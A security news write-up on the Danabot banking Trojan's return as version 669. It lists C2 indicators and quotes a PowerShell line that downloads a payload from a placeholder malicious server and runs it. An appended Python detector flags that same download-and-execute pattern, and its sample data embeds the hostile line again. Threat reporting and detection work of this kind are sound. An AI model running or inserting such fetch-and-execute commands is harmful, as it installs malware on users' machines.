Danabot Malware Resurfaced with Version 669 Following Operation Endgame

Danabot, a notorious banking Trojan, has made a significant comeback with its new version 669 after a period of inactivity triggered by Operation Endgame’s law enforcement sweep in May 2025.

This advanced malware’s resurgence signals a new threat wave targeting financial institutions, cryptocurrency users, and individual victims using sophisticated multi-stage attacks.

While Danabot carries a legacy of credential theft, financial fraud, and information exfiltration, its latest evolution marks a technical refinement in both behavioral tactics and infrastructure.

The malware leverages multiple attack vectors to infect systems, including spear-phishing campaigns and malicious documents designed to deliver its payload.

Victims are lured into executing obfuscated attachments using convincing social engineering, which triggers the initial infection.

Once established, Danabot version 669 deploys several modules specializing in data harvesting, lateral movement across networks, and payload delivery tailored for Windows environments.

The malware also targets cryptocurrency wallets, amplifying its reach beyond traditional banking fraud.

Security researchers from Zscaler ThreatLabz identified and analyzed version 669, confirming its revival and exposing its technical underpinnings.

Notably, ThreatLabz documented shifts in Danabot’s command-and-control (C2) infrastructure.

The malware now employs a mix of conventional IP-based C2s and .onion addresses to manage payloads and data exfiltration, ensuring operational resilience and complicating mitigation efforts.

Key C2 addresses include 62.60.226[.]146:443, 62.60.226[.]154:443, and several .onion domains such as aqpfkxxtvahlzr6vobt6fhj4riev7wxzoxwItbcysuybirygxzvp23ad[.]onion:44.

Infection Mechanism Spotlight

At the core of Danabot’s infection process is a robust loader. Once executed, this loader downloads additional encrypted modules and configuration files from multiple C2 servers. The following code snippet represents the initial stage payload deployment:

Invoke-WebRequest -Uri 'http://malicious-server/payload' -OutFile 'C:\Users\Public\payload.exe'; Start-Process 'C:\Users\Public\payload.exe'

After establishing a foothold, Danabot injects itself into legitimate Windows processes as a persistence measure and leverages scheduled tasks for continual execution.

The modular design allows the threat actor to remotely manage new payloads and update infection parameters without direct user interaction.

This strategic flexibility, coupled with enhanced detection evasion through encrypted configuration and C2 communications, makes Danabot version 669 a formidable adversary in the current threat landscape.
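The download-and-execute one-liner shown above is exactly the shape a defender can hunt for in PowerShell script block logging (Event ID 4104). The following detector is an added example, not code from the article or from ThreatLabz; the log samples, staging-directory list, and function names are constructed assumptions.

```python
"""Flag PowerShell script blocks that download a file to a user-writable
staging path and then launch it (the loader pattern described above).
Input is constructed text in the shape of Event ID 4104 ScriptBlockText."""
import re
from dataclasses import dataclass

# Download cmdlet plus common aliases; the -OutFile / -o target is captured.
DOWNLOAD_RE = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|curl|wget)\b[^;\n]*?-(?:OutFile|o)\s+"
    r"(['\"]?)(?P<path>[^'\"\s;]+)\1", re.IGNORECASE)
# Launch primitives: Start-Process or the call operator (& 'path').
EXEC_RE = re.compile(
    r"(?:Start-Process\s+|&\s*)(['\"]?)(?P<path>[^'\"\s;]+)\1", re.IGNORECASE)
# World-writable staging directories loaders tend to use (constructed list).
STAGING_DIRS = (r"c:\users\public", r"c:\programdata", r"c:\windows\temp",
                r"\appdata\local\temp", "$env:temp", "$env:public")

# Constructed script blocks: index 0 is the article's snippet, index 1 is benign.
SAMPLE_SCRIPT_BLOCKS = (
    r"Invoke-WebRequest -Uri 'http://malicious-server/payload' "
    r"-OutFile 'C:\Users\Public\payload.exe'; Start-Process 'C:\Users\Public\payload.exe'",
    r"Invoke-WebRequest -Uri 'https://example.invalid/report.csv' -OutFile 'C:\Reports\report.csv'",
)

@dataclass
class Finding:
    path: str                  # file written by the download cmdlet
    staged_in_public_dir: bool # written to a known world-writable location
    executed: bool             # same path launched in the same script block

def analyze_script_block(script: str) -> list[Finding]:
    """One Finding per downloaded file; downloaded-then-executed is the high-signal case."""
    launched = {m.group("path").lower() for m in EXEC_RE.finditer(script)}
    findings = []
    for m in DOWNLOAD_RE.finditer(script):
        path = m.group("path")
        lower = path.lower()
        findings.append(Finding(path=path,
                                staged_in_public_dir=any(d in lower for d in STAGING_DIRS),
                                executed=lower in launched))
    return findings

def is_download_and_execute(script: str) -> bool:
    return any(f.executed for f in analyze_script_block(script))

def scan_script_blocks(blocks) -> list[int]:
    """Return the indices of script blocks matching the download-and-execute pattern."""
    return [i for i, block in enumerate(blocks) if is_download_and_execute(block)]

if __name__ == "__main__":
    print("flagged blocks:", scan_script_blocks(SAMPLE_SCRIPT_BLOCKS))
```

A match on the staging directory alone is low-signal; the combination of a download to such a path and a launch of the same path in one script block is what warrants an alert.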
